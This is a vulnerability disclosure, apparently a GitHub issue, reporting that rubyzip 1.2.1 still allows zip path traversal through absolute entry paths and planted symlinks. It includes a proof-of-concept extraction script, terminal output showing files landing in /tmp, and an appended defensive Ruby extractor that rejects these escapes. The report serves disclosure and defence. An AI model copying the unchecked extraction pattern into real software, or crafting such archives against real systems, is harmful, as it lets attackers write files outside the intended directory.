Overview
This issue is similar to the already closed #315, but I found two ways to bypass that fix.
You can find the files for the tests at https://github.com/tuzovakaoff/zip_path_traversal
Proof of concept:
rubyzip.rb
require 'zip'

# Take the archive path from the command line.
first_arg, *the_rest = ARGV

Zip::File.open(first_arg) do |zip_file|
  zip_file.each do |entry|
    puts "Extracting #{entry.name}"
    # Extracts each entry under its archive-supplied name, unchanged
    # (this is the behaviour the report demonstrates).
    entry.extract(entry.name)
  end
end
1. Files with absolute path
UnZip strips the absolute path
> ls
absolutepath.zip rubyzip.rb symlink.zip
> unzip absolutepath.zip
Archive: absolutepath.zip
warning: stripped absolute path spec from /tmp/
creating: tmp/
warning: stripped absolute path spec from /tmp/file.txt
inflating: tmp/file.txt
> ls
absolutepath.zip symlink.zip
rubyzip.rb tmp
rubyzip extracts files with an absolute path
> ls
absolutepath.zip rubyzip.rb symlink.zip
> ruby rubyzip.rb absolutepath.zip
Extracting /tmp/
Extracting /tmp/file.txt
> ls
absolutepath.zip rubyzip.rb symlink.zip
> ls /tmp
file.txt
2. Archive with symbolic link
UnZip extracts only the symbolic link
> unzip symlink.zip
Archive: symlink.zip
linking: path -> ../../../../../tmp
checkdir error: path exists but is not directory
unable to process path/file.txt.
finishing deferred symbolic links:
path -> ../../../../../tmp
> ls -l path
lrwxr-xr-x 1 user group 18 Jun 14 21:19 path -> ../../../../../tmp
rubyzip extracts the symbolic link and puts the file into the /tmp folder
> ruby rubyzip.rb symlink.zip
Extracting path
Extracting path/file.txt
> ls -l path
lrwxr-xr-x 1 user group 18 Jun 14 21:22 path -> ../../../../../tmp
> ls /tmp
file.txt
Vulnerable version and test environment
> uname -rsv
Darwin 17.6.0 Darwin Kernel Version 17.6.0: Tue May 8 15:22:16 PDT 2018; root:xnu-4570.61.1~1/RELEASE_X86_64
> ruby -v
ruby 2.5.0p0 (2017-12-25 revision 61468) [x86_64-darwin17]
> gem list | grep zip
rubyzip (1.2.1)
> uname -rsv
Linux 2.6.32-573.18.1.el6.x86_64 #1 SMP Tue Feb 9 22:46:17 UTC 2016
> ruby -v
ruby 2.4.1p111 (2017-03-22 revision 58053) [x86_64-linux]
> gem list | grep zip
rubyzip (1.2.1)
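A defensive extractor in Ruby, added here as an example (not code from the reporter or from rubyzip itself), that refuses both escapes shown above: absolute entry names and writes that pass through a symlink recreated from an earlier entry. It uses only the standard library; the scratch directories, the entry data and the pre-planted symlink in the demo are constructed, and the reference to rubyzip's Zip::Entry#symlink? is a pointer to the extra check a real extractor would add.

```ruby
require 'fileutils'
require 'tmpdir'
class UnsafeEntry < StandardError; end

# Map an archive entry name onto dest_root, refusing the escapes the report
# exercises: absolute names, ".." components, and any path component that is
# already a symlink on disk (planted by an earlier entry in the same archive).
def safe_destination(dest_root, entry_name)
  root = File.realpath(dest_root)
  raise UnsafeEntry, "absolute path: #{entry_name}" if entry_name.start_with?('/')
  parts = entry_name.split('/').reject(&:empty?)
  raise UnsafeEntry, "parent reference: #{entry_name}" if parts.include?('..')
  parts.inject(root) do |current, part|
    candidate = File.join(current, part)
    # File.symlink? uses lstat, so "path -> ../../../../../tmp" is refused
    # here before anything is written through it.
    raise UnsafeEntry, "symlink on path: #{candidate}" if File.symlink?(candidate)
    candidate
  end
end

# Write one entry only after its name passes the check. With rubyzip you would
# additionally skip entries whose entry.symlink? is true rather than recreate them.
def extract_entry(dest_root, entry_name, data)
  target = safe_destination(dest_root, entry_name)
  if entry_name.end_with?('/')
    FileUtils.mkdir_p(target)
  else
    FileUtils.mkdir_p(File.dirname(target))
    File.binwrite(target, data)
  end
  target
end

# Constructed demo: replays the entry names from the report's two archives
# against a scratch directory and returns a verdict per entry.
def demo
  Dir.mktmpdir do |dest|
    Dir.mktmpdir do |outside|
      # Pretend a naive extractor already recreated the symlink entry "path".
      File.symlink(outside, File.join(dest, 'path'))
      names = ['/tmp/', '/tmp/file.txt', 'path/file.txt', 'tmp/', 'tmp/file.txt']
      verdicts = names.each_with_object({}) do |name, acc|
        acc[name] = (extract_entry(dest, name, "constructed\n") && :written rescue :rejected)
      end
      verdicts[:leaked_outside] = File.exist?(File.join(outside, 'file.txt'))
      verdicts
    end
  end
end
```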